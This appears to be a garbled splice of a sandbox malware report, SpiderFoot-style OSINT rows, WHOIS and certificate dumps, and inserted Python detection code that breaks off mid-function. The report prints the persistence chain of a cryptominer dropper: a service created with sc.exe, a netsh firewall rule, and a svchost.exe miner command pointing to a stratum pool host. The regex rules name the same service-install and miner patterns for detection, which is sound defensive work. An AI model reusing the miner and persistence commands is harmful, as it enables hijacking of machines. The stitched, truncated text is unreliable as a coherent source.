commandline "/C move /Y "%TEMP%\\auwtnjty.exe" %WINDIR%\\SysWOW64\\ogiqgahj\\" (UID: 00021708-00002924)\n Spawned process "sc.exe" with commandline "create ogiqgahj binPath= "%WINDIR%\\SysWOW64\\ogiqgahj\\auwtnjty.ex ..." (UID: 00021766-00001768), Spawned process "sc.exe" with commandline "description ogiqgahj "wifi internet conection"" (UID: 00021802-00003812), Spawned process "sc.exe" with commandline "start ogiqgahj" (UID: 00021837-00001656), Spawned process "auwtnjty.exe" with commandline "/d"C:\\4623e1ce31a8671e59640e83fc545a5f19e167c31cfc6e8d097864c7a4 ..." (UID: 00021867-00003764)\n Spawned process "netsh.exe" with commandline "advfirewall firewall add rule name="Host-process for services of ..." 
(UID: 00021872-00002388), Spawned process "svchost.exe" (UID: 00022025-00002608), Spawned process "svchost.exe" with commandline "-a cryptonight-heavy --variant tube -o stratum+tcp://185.65.202. ..." (UID: 00023938-00003132)'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-3', u'name': u'Runs shell commands', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 9, u'description': u'"/C mkdir %WINDIR%\\SysWOW64\\ogiqgahj\\" on 2019-5-13.11:42:41.985\n "/C move /Y "%TEMP%\\auwtnjty.exe" %WINDIR%\\SysWOW64\\ogiqgahj\\" on 2019-5-13.11:42:42.876'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-72', u'name': u'Overview of unique CLSIDs touched in registry', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 3, u'description': u'".exe" touched "Security Manager" (Path: "HKCU\\WOW6432NODE\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}")\n ".exe" touched "Computer" (Path: "HKCU\\WOW6432NODE\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER")\n ".exe" touched "Network" (Path: "HKCU\\WOW6432NODE\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER")\n ".exe" touched "Recycle Bin" (Path: "HKCU\\WOW6432NODE\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER")\n ".exe" touched "Control Panel" (Path: "HKCU\\WOW6432NODE\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER")\n ".exe" touched "UsersFiles" (Path: "HKCU\\WOW6432NODE\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER")\n ".exe" touched "UsersLibraries" (Path: "HKCU\\WOW6432NODE\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER")\n ".exe" touched "CLSID_SearchFolder" (Path: "HKCU\\WOW6432NODE\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER")\n ".exe" touched "IE History and Feeds Shell Data Source 
for Windows Search" (Path: "HKCU\\WOW6432NODE\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER")\n ".exe" touched "Public Folder" (Path: "HKCU\\WOW6432NODE\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER")\n ".exe" touched "Control Panel command object for Start menu and desktop" (Path: "HKCU\\WOW6432NODE\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER")\n ".exe" touched "@%systemroot%\\system32\\mssvp.dll,-110" (Path: "HKCU\\WOW6432NODE\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER")\n ".exe" touched "CLSID_SearchHome" (Path: "HKCU\\WOW6432NODE\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER")\n ".exe" touched "Other Users Folder" (Path: "HKCU\\WOW6432NODE\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER")\n ".exe" touched "@%systemroot%\\system32\\mssvp.dll,-112" (Path: "HKCU\\WOW6432NODE\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER")\n ".exe" touched "CLSID_StartMenuProviderFolder" (Path: "HKCU\\WOW6432NODE\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER")\n ".exe" touched "CLSID_StartMenuPathCompleteProviderFolder" (Path: "HKCU\\WOW6432NODE\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER")\n ".exe" touched "Games Explorer" (Path: "HKCU\\WOW6432NODE\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER")\n ".exe" touched "Computers and Devices" (Path: "HKCU\\WOW6432NODE\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER")\n ".exe" touched "Memory Mapped Cache Mgr" (Path: "HKCU\\WOW6432NODE\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\TREATAS")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"43.231.4.7:443"\n "94.23.27.38:480"\n "219.87.84.65:25"\n "69.168.106.65:25"\n "213.33.98.149:25"\n 
"209.143.0.195:25"\n "185.65.202.47:8087"\n "209.85.200.27:25"\n "144.160.159.22:25"\n "72.167.238.29:25"\n "170.146.221.13:25"\n "74.208.5.20:25"\n "184.171.128.11:25"\n "69.168.106.33:25"\n "185.37.226.254:25"\n "68.87.20.5:25"\n "207.69.189.231:25"\n "98.137.157.43:25"\n "208.180.40.132:25"\n "65.20.0.49:25"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-67', u'name': u'Process launched with changed environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 9, u'description': u'Process "auwtnjty.exe" (UID: 00021867-00003764) was launched with modified environment variables: "CommonProgramFiles, Path, LOCALAPPDATA, USERDOMAIN, PROCESSOR_ARCHITECTURE, TEMP, APPDATA, USERPROFILE, TMP, ProgramFiles, USERNAME"\n Process "auwtnjty.exe" (UID: 00021867-00003764) was launched with missing environment variables: "PROCESSOR_ARCHITEW6432, LOGONSERVER, PROMPT, VXDIR, HOMEPATH, HOMEDRIVE"\n Process "svchost.exe" (UID: 00022025-00002608) was launched with new environment variables: "PROCESSOR 81.88.48.101 2022-12-18 00:31:50 Open TCP Port No Pulsedive 0 0 4 0 None 195.110.124.133:443 195.110.124.0/24 2022-12-18 00:04:11 Co-Hosted Site No SSL Certificate Analyzer 0 0 2 0 None cdnjs.cloudflare.com 188.114.97.0 2022-12-18 00:21:09 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Server: cloudflare Date: Content-Type: text/html Content-Length: 151 Connection: keep-alive CF-RAY: 77b25d2e9a19226e-ORD 188.114.96.0 2022-12-18 00:19:08 Physical Location No ipapi.co 0 0 3 0 None Florence, Tuscany, 52, Italy, IT 81.88.48.102 2022-12-18 00:16:53 Affiliate - Company Name No Company Name Extractor 0 0 4 0 None CloudFlare, Inc. 
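The Hybrid Analysis record above lays out a service-install-and-mine sequence: a file dropped to %TEMP%, a directory created under SysWOW64, the file moved there, `sc.exe create` / `description` / `start` for a service whose description is "wifi internet conection", a `netsh advfirewall` allow rule, and an svchost.exe launched with a `cryptonight-heavy` / `stratum+tcp://` command line under a parent that is not services.exe. The following is an added example, not Hybrid Analysis or SpiderFoot code: detection rules run over constructed Sysmon-style process-creation events that mirror that sequence. The image paths, the user profile path, the firewall rule name and the pool host `pool.example` are constructed; the report's truncated pool address and rule name are deliberately not filled in. The dropper name (the report's submit_name) and the service binary name are taken from the report.

```python
"""Detection pass for the service-install-and-mine chain in the sandbox report above.
Events are constructed with Sysmon Event ID 1-like fields (Image, CommandLine, ParentImage)."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    image: str      # Image
    cmdline: str    # CommandLine
    parent: str     # ParentImage


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


# Rule: sc.exe create whose binPath sits in a user-writable or made-up system subdirectory
# (a fresh SysWOW64\<random>\ directory is not where legitimate services live; drivers\ is excluded).
_BINPATH = re.compile(r'binPath=\s*"?([^"]+?)(?:"|$)', re.I)
_BAD_SVC_DIR = re.compile(
    r"\\(?:syswow64|system32)\\(?!drivers\\)[^\\]+\\|\\temp\\|\\appdata\\|\\programdata\\", re.I)


def rule_service_binpath_suspicious(ev: ProcEvent) -> bool:
    if _base(ev.image) != "sc.exe" or not re.search(r"\bcreate\b", ev.cmdline, re.I):
        return False
    m = _BINPATH.search(ev.cmdline)
    return bool(m and _BAD_SVC_DIR.search(m.group(1)))


# Rule: cmd.exe moving or copying a payload out of %TEMP% into a system directory.
_STAGE = re.compile(r"\b(?:move|copy|xcopy)\b.*\\temp\\.*\\(?:syswow64|system32)\\", re.I)


def rule_payload_staged_from_temp(ev: ProcEvent) -> bool:
    return _base(ev.image) == "cmd.exe" and bool(_STAGE.search(ev.cmdline))


# Rule: a firewall allow rule added through netsh.
def rule_firewall_allow_rule_added(ev: ProcEvent) -> bool:
    return _base(ev.image) == "netsh.exe" and bool(
        re.search(r"advfirewall\s+firewall\s+add\s+rule", ev.cmdline, re.I))


# Rule: stratum pool URLs and CryptoNight variants, the xmrig-style fingerprint in the report.
_MINER = re.compile(r"stratum\+(?:tcp|ssl)://|cryptonight|--donate-level", re.I)


def rule_miner_cmdline(ev: ProcEvent) -> bool:
    return bool(_MINER.search(ev.cmdline))


# Rule: genuine svchost.exe instances are started by services.exe, nothing else.
def rule_svchost_unusual_parent(ev: ProcEvent) -> bool:
    return _base(ev.image) == "svchost.exe" and _base(ev.parent) != "services.exe"


RULES = {
    "service_binpath_suspicious": rule_service_binpath_suspicious,
    "payload_staged_from_temp": rule_payload_staged_from_temp,
    "firewall_allow_rule_added": rule_firewall_allow_rule_added,
    "miner_cmdline": rule_miner_cmdline,
    "svchost_unusual_parent": rule_svchost_unusual_parent,
}


def detect(events) -> dict:
    """Map each rule name to the indices of the events that triggered it."""
    hits = {}
    for i, ev in enumerate(events):
        for name, rule in RULES.items():
            if rule(ev):
                hits.setdefault(name, []).append(i)
    return hits


def verdict(hits: dict) -> str:
    """Service persistence plus a miner command line is the high-confidence combination."""
    if "miner_cmdline" in hits and "service_binpath_suspicious" in hits:
        return "service-installed miner"
    if "miner_cmdline" in hits:
        return "miner"
    if len(hits) >= 2:
        return "suspicious service install"
    return "no finding"


# Constructed sample events (hypothetical paths; names from the report where it gives them).
DROPPER = "C:\\4623e1ce31a8671e59640e83fc545a5f19e167c31cfc6e8d097864c7a4c27859.exe"
SVC_BIN = "C:\\Windows\\SysWOW64\\ogiqgahj\\auwtnjty.exe"
SAMPLE_EVENTS = [
    # Benign baseline: a real service host started by services.exe.
    ProcEvent("C:\\Windows\\System32\\svchost.exe", "svchost.exe -k netsvcs -p", "C:\\Windows\\System32\\services.exe"),
    ProcEvent("C:\\Windows\\SysWOW64\\cmd.exe", "cmd.exe /C mkdir C:\\Windows\\SysWOW64\\ogiqgahj\\", DROPPER),
    ProcEvent("C:\\Windows\\SysWOW64\\cmd.exe",
              'cmd.exe /C move /Y "C:\\Users\\u\\AppData\\Local\\Temp\\auwtnjty.exe" C:\\Windows\\SysWOW64\\ogiqgahj\\', DROPPER),
    ProcEvent("C:\\Windows\\SysWOW64\\sc.exe", f'sc.exe create ogiqgahj binPath= "{SVC_BIN}"', DROPPER),
    ProcEvent("C:\\Windows\\SysWOW64\\sc.exe", 'sc.exe description ogiqgahj "wifi internet conection"', DROPPER),
    ProcEvent("C:\\Windows\\SysWOW64\\sc.exe", "sc.exe start ogiqgahj", DROPPER),
    ProcEvent("C:\\Windows\\SysWOW64\\netsh.exe",  # rule name is constructed, not the report's truncated one
              f'netsh.exe advfirewall firewall add rule name="constructed" dir=in action=allow program="{SVC_BIN}"', SVC_BIN),
    ProcEvent("C:\\Windows\\System32\\svchost.exe",  # pool host is constructed
              "svchost.exe -a cryptonight-heavy --variant tube -o stratum+tcp://pool.example:3333", SVC_BIN),
    # Benign vendor service install: binPath under Program Files, so no rule fires.
    ProcEvent("C:\\Windows\\System32\\sc.exe", 'sc.exe create AcmeAgent binPath= "C:\\Program Files\\Acme\\agent.exe"',
              "C:\\Windows\\System32\\msiexec.exe"),
]

if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for name, idx in hits.items():
        print(f"{name}: events {idx}")
    print("verdict:", verdict(hits))
```

On the sample the staging, service-creation, firewall and miner rules fire on events 2, 3, 6 and 7, while the baseline svchost.exe and the Program Files service install produce nothing. The binPath rule is the one to tune: it flags any new directory directly under System32 or SysWOW64, which is rare for legitimate software but worth an allow-list in a large fleet.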
Domain Name: CLOUDFLARE.COM Registry Domain ID: 1542998887_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.cloudflare.com Registrar URL: http://www.cloudflare.com Updated Date: 2017-05-24T17:44:01Z Creation Date: 2009-02-17T22:07:54Z Registry Expiry Date: 2024-02-17T22:07:54Z Registrar: CloudFlare, Inc. Registrar IANA ID: 1910 Registrar Abuse Contact Email: Registrar Abuse Contact Phone: Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited Name Server: NS3.CLOUDFLARE.COM Name Server: NS4.CLOUDFLARE.COM Name Server: NS5.CLOUDFLARE.COM Name Server: NS6.CLOUDFLARE.COM Name Server: NS7.CLOUDFLARE.COM DNSSEC: signedDelegation DNSSEC DS Data: 2371 13 2 32996839A6D808AFE3EB4A795A0E6A7A39A76FC52FF228B22B76F6D63826F2B9 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-12-18T00:10:57Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. 
TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. 
Domain Name: CLOUDFLARE.COM Registry Domain ID: 1542998887_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.cloudflare.com Registrar URL: https://www.cloudflare.com Updated Date: 2021-09-27T15:18:45Z Creation Date: 2009-02-17T22:07:54Z Registrar Registration Expiration Date: 2024-02-17T22:07:54Z Registrar: Cloudflare, Inc. Registrar IANA ID: 1910 Domain Status: clientdeleteprohibited https://icann.org/epp#clientdeleteprohibited Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited Domain Status: serverdeleteprohibited https://icann.org/epp#serverdeleteprohibited Domain Status: servertransferprohibited https://icann.org/epp#servertransferprohibited Domain Status: serverupdateprohibited https://icann.org/epp#serverupdateprohibited Domain Status: clientupdateprohibited https://icann.org/epp#clientupdateprohibited Registry Registrant ID: Registrant Name: DATA REDACTED Registrant Organization: DATA REDACTED Registrant Street: DATA REDACTED Registrant City: DATA REDACTED Registrant State/Province: CA Registrant Postal Code: DATA REDACTED Registrant Country: US Registrant Phone: DATA REDACTED Registrant Phone Ext: DATA REDACTED Registrant Fax: DATA REDACTED Registrant Fax Ext: DATA REDACTED Registrant Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com Registry Admin ID: Admin Name: DATA REDACTED Admin Organization: DATA REDACTED Admin Street: DATA REDACTED Admin City: DATA REDACTED Admin State/Province: DATA REDACTED Admin Postal Code: DATA REDACTED Admin Country: DATA REDACTED Admin Phone: DATA REDACTED Admin Phone Ext: DATA REDACTED Admin Fax: DATA REDACTED Admin Fax Ext: DATA REDACTED Admin Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com Registry Tech ID: Tech Name: DATA REDACTED Tech Organization: DATA REDACTED Tech Street: DATA REDACTED Tech City: DATA REDACTED Tech State/Province: DATA REDACTED Tech Postal Code: DATA REDACTED Tech Country: DATA REDACTED Tech Phone: DATA REDACTED Tech Phone Ext: DATA 
REDACTED Tech Fax: DATA REDACTED Tech Fax Ext: DATA REDACTED Tech Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com Registry Billing ID: Billing Name: DATA REDACTED Billing Organization: DATA REDACTED Billing Street: DATA REDACTED Billing City: DATA REDACTED Billing State/Province: DATA REDACTED Billing Postal Code: DATA REDACTED Billing Country: DATA REDACTED Billing Phone: DATA REDACTED Billing Phone Ext: DATA REDACTED Billing Fax: DATA REDACTED Billing Fax Ext: DATA REDACTED Billing Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com Name Server: ns3.cloudflare.com Name Server: ns4.cloudflare.com Name Server: ns5.cloudflare.com Name Server: ns6.cloudflare.com Name Server: ns7.cloudflare.com DNSSEC: signedDelegation Registrar Abuse Contact Email: registrar-abuse@cloudflare.com Registrar Abuse Contact Phone: +1.4153197517 URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:11:03Z <<< For more information on Whois status codes, please visit https://icann.org/epp Cloudflare provides more than 13 million domains with the tools to give their global users a faster, more secure, and more reliable internet experience. NOTICE: Data in the Cloudflare Registrar WHOIS database is provided to you by Cloudflare under the terms and conditions at https://www.cloudflare.com/domain-registration-agreement/ By submitting this query, you agree to abide by these terms. 
Register your domain name at https://www.cloudflare.com/registrar/ 2022-12-18 00:14:47 Internet Name - Unresolved No VirusTotal 0 0 1 0 None hook.plague.fun plague.fun 2022-12-18 00:06:15 Linked URL - Internal No Web Spider 0 0 1 0 None http://misogyny.wtf misogyny.wtf 2022-12-18 00:07:06 Web Content No Web Spider 1 0 2 0 None http://misogyny.wtf:2020/copy 2022-12-18 00:16:27 SSL Certificate - Raw Data No SSL Certificate Analyzer 0 0 2 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 09:6b:82:e9:73:99:94:ba:fd:55:b0:21:db:c7:c8:bf Signature Algorithm: ecdsa-with-SHA256 Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 Validity Not Before: Aug 3 00:00:00 2022 GMT Not After : Aug 2 23:59:59 2023 GMT Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:76:16:8f:f9:e3:b6:aa:dc:0b:91:40:d8:f1:ee: e8:7f:8e:97:0e:7d:bd:b0:c5:93:63:66:fa:7b:4f: 17:a1:09:ff:20:68:33:a3:45:37:1f:e8:4b:eb:77: 53:b6:57:60:ef:a1:af:f1:36:97:26:c7:fa:95:e9: 9a:ab:1a:dd:7d ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Authority Key Identifier: keyid:A5:CE:37:EA:EB:B0:75:0E:94:67:88:B4:45:FA:D9:24:10:87:96:1F X509v3 Subject Key Identifier: 18:B9:52:2C:13:17:3E:3A:39:88:53:5C:BD:9C:BE:05:0B:02:25:90 X509v3 Subject Alternative Name: DNS:cdnjs.cloudflare.com, DNS:*.cdnjs.cloudflare.com, DNS:sni.cloudflaressl.com X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 CRL Distribution Points: Full Name: URI:http://crl3.digicert.com/CloudflareIncECCCA-3.crl Full Name: URI:http://crl4.digicert.com/CloudflareIncECCCA-3.crl X509v3 Certificate Policies: Policy: 2.23.140.1.2.2 CPS: http://www.digicert.com/CPS Authority Information Access: OCSP - URI:http://ocsp.digicert.com CA Issuers - URI:http://cacerts.digicert.com/CloudflareIncECCCA-3.crt X509v3 Basic 
Constraints: critical CA:FALSE CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9: 03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E Timestamp : Aug 3 19:12:00.178 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:35:9E:7D:1C:03:B8:4A:87:C0:13:01:D5: 28:AD:64:70:5B:10:FC:72:88:58:48:7A:E3:4C:D5:27: DB:76:00:22:02:20:12:E0:E2:34:44:22:24:C1:E5:7A: 25:12:AD:9E:F8:88:A1:A0:65:AF:1A:76:C9:03:41:4F: 8A:70:C8:E6:BA:DA Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 35:CF:19:1B:BF:B1:6C:57:BF:0F:AD:4C:6D:42:CB:BB: B6:27:20:26:51:EA:3F:E1:2A:EF:A8:03:C3:3B:D6:4C Timestamp : Aug 3 19:12:00.017 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:EE:6E:D3:CF:4A:8A:13:16:AB:6B:C2: F7:32:B6:2A:5B:13:45:7A:44:ED:3B:86:8B:85:F4:94: BA:E0:8C:12:60:02:21:00:8C:46:CA:E7:C6:A7:69:C8: 22:62:61:BA:E1:29:8F:BC:3C:BF:F4:A2:81:44:80:DA: F5:C9:B6:E6:AF:CD:A6:FB Signed Certificate Timestamp: Version : v1 (0x0) Log ID : B3:73:77:07:E1:84:50:F8:63:86:D6:05:A9:DC:11:09: 4A:79:2D:B1:67:0C:0B:87:DC:F0:03:0E:79:36:A5:9A Timestamp : Aug 3 19:12:00.038 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:E5:0C:F6:4E:3C:40:01:1A:EC:D8:91: 2D:69:6A:1C:FF:4F:75:55:8C:D7:D2:38:86:36:36:FA: EE:4F:65:29:FC:02:21:00:9F:BC:3F:8A:93:C7:A2:ED: F5:94:99:85:01:90:F2:60:36:3B:2E:03:0E:E0:46:5E: 8C:3E:16:39:2B:64:D1:78 Signature Algorithm: ecdsa-with-SHA256 30:45:02:21:00:d8:35:e0:5c:fe:c9:39:b4:06:5a:95:36:1c: 73:f4:85:1c:c5:6e:6b:ef:48:76:d6:7f:a3:fe:55:ed:82:7f: c5:02:20:7f:8c:86:3a:6f:04:3e:0d:d7:cc:87:51:a8:0d:5c: ce:bc:93:88:aa:35:4a:5c:02:bb:47:5c:7c:87:7b:21:de 188.114.97.9 2022-12-18 00:03:08 Affiliate - IP Address No DNS Look-aside 2 0 2 0 None 81.88.52.224 81.88.52.232 2022-12-18 00:14:35 Vulnerability - CVE Medium Yes Tool - testssl.sh 0 1 2 0 None CVE-2016-2183 https://nvd.nist.gov/vuln/detail/CVE-2016-2183 Score: 5.0 Description: The DES and Triple DES 
ciphers, as used in the TLS, SSH, and IPSec protocols and other protocols and products, have a birthday bound of approximately four billion blocks, which makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTPS session using Triple DES in CBC mode, aka a "Sweet32" attack. 188.114.96.9 2022-12-18 00:04:45 Malicious IP Address Yes Maltiverse 0 1 2 0 None Maltiverse [172.67.190.129] 172.67.190.129 2022-12-18 00:09:53 Co-Hosted Site No HackerTarget 0 0 2 0 None braseciscaditbest.cf 172.67.147.230 2022-12-18 00:03:32 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lhcp3233.webapps.net 81.88.52.233 2022-12-18 00:08:26 Physical Location No Fraudguard 0 0 2 0 None United States, Missouri, Kansas City 34.149.204.188 2022-12-18 00:04:30 Raw DNS Records No DNS Raw Records 0 0 1 0 None zerotwo-best-waifu.online. 900 IN TXT "v=spf1 include:spf.webapps.net ~all" zerotwo-best-waifu.online 2022-12-18 00:13:46 Affiliate - Email Address No E-Mail Address Extractor 0 0 4 0 None domain.operations@web.com Domain Name: AMENWORLD.COM Registry Domain ID: 15262498_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.networksolutions.com Registrar URL: http://networksolutions.com Updated Date: 2022-11-26T05:02:58Z Creation Date: 1999-12-14T23:19:10Z Registry Expiry Date: 2024-12-14T23:19:10Z Registrar: Network Solutions, LLC Registrar IANA ID: 2 Registrar Abuse Contact Email: abuse@web.com Registrar Abuse Contact Phone: +1.8003337680 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Name Server: NS2.AMEN.FR Name Server: PARIS.AMEN.FR DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-12-18T00:10:57Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of 
the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. 
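The "SSL Certificate - Raw Data" rows on this page all carry one certificate: subject `sni.cloudflaressl.com`, SANs `cdnjs.cloudflare.com`, `*.cdnjs.cloudflare.com` and `sni.cloudflaressl.com`, issued by Cloudflare Inc ECC CA-3 and valid 3 Aug 2022 to 2 Aug 2023. None of the SANs names a host scanned here, which is the usual result when a scanner connects to a Cloudflare edge IP without sending SNI: the edge answers with its own certificate. The "Co-Hosted Site cdnjs.cloudflare.com" row derived from that certificate therefore records a shared edge certificate, not evidence that the target and cdnjs share a server. The following is an added example, not SpiderFoot's SSL Certificate Analyzer: a parser for the flattened openssl-style text exactly as it appears on this page, with RFC 6125-style hostname matching so the coverage question can be checked mechanically. `CERT_TEXT` is a trimmed copy of the page's dump with the public-key and SCT blobs left out; `SCAN_HOSTS` lists hostnames that appear elsewhere on the page.

```python
"""Parse the openssl-style certificate text from this page and check which scanned hostnames
it actually covers. CERT_TEXT is a trimmed copy of the page's flattened dump."""
import re
from datetime import datetime, timezone

CERT_TEXT = (
    "Certificate: Data: Version: 3 (0x2) Serial Number: 09:6b:82:e9:73:99:94:ba:fd:55:b0:21:db:c7:c8:bf "
    "Signature Algorithm: ecdsa-with-SHA256 Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 "
    "Validity Not Before: Aug 3 00:00:00 2022 GMT Not After : Aug 2 23:59:59 2023 GMT "
    "Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com "
    "Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) "
    "ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: "
    "X509v3 Subject Alternative Name: DNS:cdnjs.cloudflare.com, DNS:*.cdnjs.cloudflare.com, DNS:sni.cloudflaressl.com "
    "X509v3 Key Usage: critical Digital Signature X509v3 Basic Constraints: critical CA:FALSE"
)

# Hostnames that appear as scan targets or related names elsewhere on this page.
SCAN_HOSTS = ["zerotwo-best-waifu.online", "misogyny.wtf", "plague.fun", "cdnjs.cloudflare.com"]


def _field(pattern: str, text: str) -> str:
    m = re.search(pattern, text)
    if not m:
        raise ValueError(f"field not found: {pattern}")
    return " ".join(m.group(1).split())


def _time(s: str) -> datetime:
    # openssl prints e.g. "Aug  3 00:00:00 2022 GMT"; the page's dump collapsed the double space.
    if s.endswith(" GMT"):
        s = s[:-4]
    return datetime.strptime(s, "%b %d %H:%M:%S %Y").replace(tzinfo=timezone.utc)


def _cn(dn: str) -> str:
    return _field(r"CN=([^,]+)", dn)


def parse_cert_text(text: str) -> dict:
    """Pull the fields a triage needs out of the whitespace-flattened openssl text output."""
    text = " ".join(text.split())
    san_raw = _field(r"Subject Alternative Name: (.*?) X509v3", text)
    return {
        "serial": _field(r"Serial Number: (\S+)", text),
        "issuer_cn": _cn(_field(r"Issuer: (.*?) Validity", text)),
        "subject_cn": _cn(_field(r"Subject: (.*?) Subject Public Key Info", text)),
        "not_before": _time(_field(r"Not Before: (.*?) Not After", text)),
        "not_after": _time(_field(r"Not After\s*: (.*?) Subject:", text)),
        "sans": [s.strip()[4:] for s in san_raw.split(",") if s.strip().startswith("DNS:")],
    }


def hostname_matches(host: str, pattern: str) -> bool:
    """RFC 6125-style matching: exact, or a wildcard covering exactly one leftmost label."""
    host, pattern = host.lower().rstrip("."), pattern.lower()
    if not pattern.startswith("*."):
        return host == pattern
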